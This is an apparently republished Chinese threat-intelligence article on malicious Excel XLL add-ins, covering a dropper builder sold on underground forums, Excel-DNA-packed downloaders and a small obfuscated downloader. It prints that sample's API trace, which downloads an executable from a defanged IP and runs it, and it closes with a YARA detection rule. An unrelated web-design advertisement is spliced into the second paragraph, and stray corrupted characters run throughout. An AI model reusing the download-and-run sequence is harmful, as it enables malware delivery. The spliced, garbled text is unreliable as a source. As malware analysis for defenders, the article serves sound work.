期,研究人員發(fā)現(xiàn)使用惡意 Microsoft Excel 加載項(XLL)文件發(fā)起攻擊的行動有所增加�,這項技術的 MITRE ATT&CK 技術項編號為 T1137.006�。
10年積累的成都網站制作����、網站設計����、外貿網站建設經驗,可以快速應對客戶對網站的新想法和需求�����。提供各種問題對應的解決方案�����。讓選擇我們的客戶得到更好���、更有力的網絡服務�����。我雖然不認識你���,你也不認識我�����。但先做網站設計后付款的網站建設流程���,更有方城免費網站建設讓你可以放心的選擇與我們合作。
這些加載項都是為了使用戶能夠利用高性能函數(shù)�����,為 Excel 工作表提供 API 調用接口�。與 VBA 等其他接口相比,該方式能夠更有效地擴展 Excel 的能力��,使其支持更多功能���,例如多線程。現(xiàn)在�����,攻擊者也濫用這項技術來達成自己的惡意目標。
攻擊者將帶有惡意 XLL 附件或者惡意鏈接的電子郵件發(fā)送給用戶���,受害者點擊附件打開 Microsoft Excel 后會提示其安裝并激活加載項�����。
提示信息
攻擊者通常將代碼置于 xlAutoOpen函數(shù)中�,該函數(shù)會在加載項被激活時立即觸發(fā)執(zhí)行�。這意味著,與要求用戶啟用宏的 VBA 宏不同��,受害者只要打開就會執(zhí)行惡意代碼��。
由于 XLL 是可移植的可執(zhí)行文件�,許多電子郵件網關都會攔截該格式的文件或者僅允許受信任簽名的加載項。
XLL 惡意軟件出售
因為 XLL 惡意文件的快速增長�,我們在地下犯罪論壇上進行了相應的調查,評估使用這種文件格式的惡意工具和服務的流行程度�����。
在讀個地下犯罪論壇中���,反復看到來自同一個攻擊者的廣告�����,正在銷售一個可以創(chuàng)建 XLL Dropper 的構建工具��。
地下論壇銷售廣告
用戶指定一個可執(zhí)行文件或下載誘餌文件的鏈接地址���,生成 XLL 文件�。
構建工具截圖
EXCEL-DNA 生成加載項
發(fā)現(xiàn)的 XLL 文件大部分都有相同的結構�,本質上說,XLL 文件是包含 xlAutoOpen導出函數(shù)的 DLL 文件����。這些 XLL 文件應該是使用 Excel-DNA工具生成的,包含多個大型的資源�。
文件資源段結構
其中包含 Excel-DNA 項目組件以及加載項,可以通過查看資源名或者同樣存儲在資源中的 XML 定義文件來識別包含 Excel 加載項的 XLL 文件�。
XML 文件
包含惡意代碼的加載項是使用 .NET 開發(fā)的,位于 MODDNA資源中��。要分析該惡意代碼���,需要將資源保存到硬盤并使用 LZMA 算法進行解壓縮��。對 .NET 文件進行反編譯后���,可見 XLL 加載項的啟動函數(shù),該加載項為惡意軟件 Downloader����。
.NET 文件代碼
使用 Excel-DNA 項目創(chuàng)建的 XLL 文件也可以使用項目提供的腳本自動解壓縮,該腳本將 XLL 文件的路徑作為參數(shù)��,然后提取��、解壓縮并將資源保存到文件夾中����。
提取 XLL 文件
自定義生成的加載項
其他不使用 Excel-DNA 的 XLL 文件中,一個 Downloader 大小只有 4.5 KB��,但吸引了研究人員的注意���。與其他 XLL 文件一樣�����,該文件也具有導出函數(shù) xlAutoOpen�。為了混淆程序控制流,樣本中包含許多連續(xù)的 jmp指令���。
動態(tài)調試截圖
經過分析后�����,研究人員發(fā)現(xiàn)可執(zhí)行代碼后有一段加密數(shù)據(jù)��。數(shù)據(jù)在循環(huán)中解密���,首先確定數(shù)據(jù)的位置與大小,緊接著進行異或解密��。每處理八個字節(jié)����,密鑰就要對用改變。
解密代碼
一旦數(shù)據(jù)被解密����,樣本可以提取三個 DLL 文件名、五個 API 函數(shù)名����、Payload 的 URL 以及存儲 Payload 的本地文件路徑�����。樣本首先通過進程環(huán)境塊(PEB)遍歷 InLoadOrderModuleList正確解析所需 DLL 的基址,然后再找到希望調用的 API 函數(shù)地址�。
解析加載模塊
然后,惡意軟件使用解析后的 API 函數(shù)下載 Payload 并將其存儲執(zhí)行���。在此樣本中�,API 調用如下所示:
GetProcAddress(“ExpandEnvironmentStringsW”)
ExpandEnvironmentStringsW(“”%APPDATA%\joludn.exe””)
LoadLibraryW(“UrlMon”)
GetProcAddress(“URLToDownloadFile”)
URLToDownloadFile(“hxxp://141.95.107[.]91/cgi/dl/8521000125423.exe”, “C:\Users\REDACTED\AppData\Roaming\joludn.exe”)
_wsystem(“C:\Users\REDACTED\AppData\Roaming\joludn.exe”)
檢測 XLL 惡意文件的 Yara 規(guī)則為:
rule xll_custom_builder
{
meta:
description = "XLL Custom Builder"
author = "[email protected]"
date = "2022-01-07"
strings:
str2 = "test"
op2 = { 4D 31 0E }
op4 = { 49 39 C6 }
condition:
uint16(0) == 0x5A4D and all of (op*) and filesize < 10KB
}
結論
Microsoft Excel 提供了許多合法執(zhí)行代碼的方式�����,如 Excel 4.0 宏��、DDE 和 VBA�����,這些都已經被攻擊者濫用���。近期�����,研究人員發(fā)現(xiàn)���,Dridex����、Agent Tesla����、Raccoon Stealer 和 Formbook 等惡意軟件家族也開始利用 XLL 文件進行傳播。利用 XLL 文件攻擊的數(shù)量增長�,表明攻擊者對這種技術很感興趣。
新聞名稱:攻擊者開始使用 XLL 文件進行攻擊
新聞來源:
http://uogjgqi.cn/article/coohpjj.html
